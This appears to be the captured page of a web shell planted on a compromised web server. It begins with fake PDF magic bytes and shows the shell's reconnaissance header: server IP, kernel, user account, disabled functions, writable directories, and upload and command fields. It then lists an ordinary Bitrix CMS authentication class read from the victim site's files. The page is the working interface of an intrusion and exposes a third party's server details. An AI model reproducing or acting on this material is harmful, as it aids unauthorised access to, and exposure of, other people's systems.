%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 3.144.26.221
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/pull/lib/rest/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/pull/lib/rest/guestauth.php
<?php

namespace Bitrix\Pull\Rest;

class GuestAuth
{
	const AUTH_TYPE = 'pull_guest';

	const METHODS_WITHOUT_AUTH = [
		'server.time',
		'pull.config.get',

	];

	const PULL_UID_PARAM = 'pull_guest_id';

	protected static $authQueryParams = array(
		'pull_guest_id',
	);

	public static function onRestCheckAuth(array $query, $scope, &$res)
	{
		global $USER;
		if($USER->IsAuthorized() || !defined("PULL_USER_ID"))
		{
			return null;
		}

		$authCode = null;
		foreach(static::$authQueryParams as $key)
		{
			if(array_key_exists($key, $query))
			{
				$authCode = $query[$key];
				break;
			}
		}

		if($authCode === null)
		{
			return null;
		}

		if(static::checkQueryMethod(static::METHODS_WITHOUT_AUTH))
		{
			if((int)$authCode === (int)PULL_USER_ID)
			{
				$res = self::getSuccessfulResult();
				return true;
			}
		}

		return null;
	}

	protected static function checkQueryMethod($whiteListMethods)
	{
		if (\CRestServer::instance()->getMethod() == 'batch')
		{
			$result = false;
			foreach (\CRestServer::instance()->getQuery()['cmd'] as $key => $method)
			{
				$method = mb_substr($method, 0, mb_strrpos($method, '?'));
				$result = in_array(mb_strtolower($method), $whiteListMethods);
				if (!$result)
				{
					break;
				}
			}
		}
		else
		{
			$result = in_array(\CRestServer::instance()->getMethod(), $whiteListMethods);
		}

		return $result;
	}

	protected static function getSuccessfulResult()
	{
		return [
			'user_id' => defined("PULL_USER_ID") ? PULL_USER_ID : 0,
			'scope' => implode(',', \CRestUtil::getScopeList()),
			'parameters_clear' => static::$authQueryParams,
			'auth_type' => static::AUTH_TYPE,
		];
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit